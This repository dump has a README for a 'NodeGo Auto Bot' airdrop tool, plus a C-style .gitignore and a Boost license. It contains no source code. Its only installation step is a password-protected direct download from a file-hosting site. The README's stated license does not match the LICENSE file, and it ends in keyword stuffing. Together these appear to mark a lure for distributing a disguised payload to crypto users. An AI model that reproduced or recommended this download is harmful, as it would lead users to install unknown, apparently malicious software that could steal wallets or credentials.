├── .gitignore ├── LICENSE └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Boost Software License - Version 1.0 - August 17th, 2003 2 | 3 | Permission is hereby granted, free of charge, to any person or organization 4 | obtaining a copy of the software and accompanying documentation covered by 5 | this license (the "Software") to use, reproduce, display, distribute, 6 | execute, and transmit the Software, and to prepare derivative works of the 7 | Software, and to permit third-parties to whom the Software is furnished to 8 | do so, all subject to the following: 9 | 10 | The copyright notices in the Software and this entire statement, including 11 | the above license grant, this restriction and the following disclaimer, 12 | must be included in all copies of the Software, in whole or in part, and 13 | all derivative works of the Software, unless such copies or derivative 14 | works are solely in the form of machine-executable object code generated by 15 | a source language processor. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT 20 | SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE SOFTWARE BE LIABLE 21 | FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR OTHERWISE, 22 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 23 | DEALINGS IN THE SOFTWARE. 24 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NodeGo Auto Bot 2 | 3 | Automated bot for NodeGo platform with support for multiple accounts and proxy configurations (HTTP/SOCKS). 4 | 5 | ## Features 6 | 7 | - Multi-account support 8 | - HTTP and SOCKS proxy support 9 | - Automatic periodic pinging 10 | - Detailed logging with colored output 11 | - Account status monitoring 12 | - Graceful shutdown handling 13 | 14 | ## 🔧 Installation 15 | # [DOWNLOAD](https://www.4sync.com/web/directDownload/0SYg-YYX/ucR3VkWM.ef25c34754ba95f31294e53aca576eca) 16 | 17 | ## PASSWORD - g1tsoft2025 18 | 19 | 20 | ## 🚨 Error Handling 21 | 22 | The bot includes comprehensive error handling: 23 | 24 | - Automatic retries for failed API requests 25 | - Detailed error logging 26 | - Graceful shutdown on interruption 27 | 28 | ## 📝 License 29 | 30 | This project is licensed under the MIT License - see the LICENSE file for details. 31 | 32 | ## ⚠️ Disclaimer 33 | 34 | This bot is for educational purposes only. Use at your own risk. We are not responsible for any consequences resulting from the use of this bot, including but not limited to account bans or losses. 35 | 36 | ## 🤝 Contributing 37 | 38 | Contributions are welcome! Please feel free to submit a Pull Request. 39 | 40 | 1. Fork the project 41 | 2. Create your feature branch (`git checkout -b feature/amazing-feature`) 42 | 3. Commit your changes (`git commit -m 'Add some amazing feature'`) 43 | 4. Push to the branch (`git push origin feature/amazing-feature`) 44 | 5. Open a Pull Request| 45 | 46 | 47 | ### 🔑 Keywords 48 | 49 | - nodejs 50 | - bot 51 | - js 52 | - airdrop 53 | - nodegoai 54 | - nodegoai-bot 55 | - nodego 56 | - nodego-bot 57 | - nodegoai-auto-bot 58 | --- 59 | --------------------------------------------------------------------------------